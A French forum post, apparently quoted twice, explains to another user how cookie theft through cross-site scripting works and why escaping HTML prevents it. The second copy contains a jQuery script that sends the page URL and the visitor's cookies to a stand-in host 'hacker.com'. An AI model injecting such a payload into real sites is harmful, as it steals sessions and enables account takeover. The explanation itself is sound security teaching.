12-09-2010, 07:23 PM
Comment espères-tu prévenir un risque que tu ne comprends pas ?
Le vol de Cookie passe par Javascript. Sur un site, Javascript ne peut lire que les cookies écrits par ce site.
Essaye de mettre le code suivant dans la barre d'adresse de ton navigateur javascript: alert(cookies); et appuie sur Enter. Une boîte de dialogue contenant les cookies du site apparaîtront alors (sous forme d'une chaîne de caractères).
Le problème, c'est que si un utilisateur arrive à écrire du Javascript sur le site, il peut récupérer les cookies des utilisateurs. Petit exemple en supposant que le site sur lequel j'injecte du code utilise la librairie Javascript jQuery (parce que j'ai pas envie de m'emmerder à faire la requête Ajax à la main) :
Si j'arrive à injecter ce code sur une page Web (par exemple ce forum), toute personne qui visitera la page verra ses cookies envoyées sur le site spécifié. Donc je n'ai plus qu'à remplacer mon cookie d'authentification par le tiens pour usurper ton compte. Bien sûr, c'est plus intéressante si toi tu usurpes mon identité, puisque tu auras alors accès à l'administration du forum.
Heureusement, les messages sont échappés sur ce forum. Donc je ne peux pas injecter de code HTML dans ma réponse : les chevrons < et > sont remplacés par leurs entités HTML équivalents < et > donc le code Javascript n'est pas exécuté.
Sephi-Chan
Le vol de Cookie passe par Javascript. Sur un site, Javascript ne peut lire que les cookies écrits par ce site.
Essaye de mettre le code suivant dans la barre d'adresse de ton navigateur javascript: alert(cookies); et appuie sur Enter. Une boîte de dialogue contenant les cookies du site apparaîtront alors (sous forme d'une chaîne de caractères).
Le problème, c'est que si un utilisateur arrive à écrire du Javascript sur le site, il peut récupérer les cookies des utilisateurs. Petit exemple en supposant que le site sur lequel j'injecte du code utilise la librairie Javascript jQuery (parce que j'ai pas envie de m'emmerder à faire la requête Ajax à la main) :
<script type="text/javascript>
$(function(){
$.ajax({
url: "http://hacker.com/get_cookies",
data: {
website: document.URL,
cookie_string: cookies
}
});
});
</script>
Si j'arrive à injecter ce code sur une page Web (par exemple ce forum), toute personne qui visitera la page verra ses cookies envoyées sur le site spécifié. Donc je n'ai plus qu'à remplacer mon cookie d'authentification par le tiens pour usurper ton compte. Bien sûr, c'est plus intéressante si toi tu usurpes mon identité, puisque tu auras alors accès à l'administration du forum.
Heureusement, les messages sont échappés sur ce forum. Donc je ne peux pas injecter de code HTML dans ma réponse : les chevrons < et > sont remplacés par leurs entités HTML équivalents < et > donc le code Javascript n'est pas exécuté.
Sephi-Chan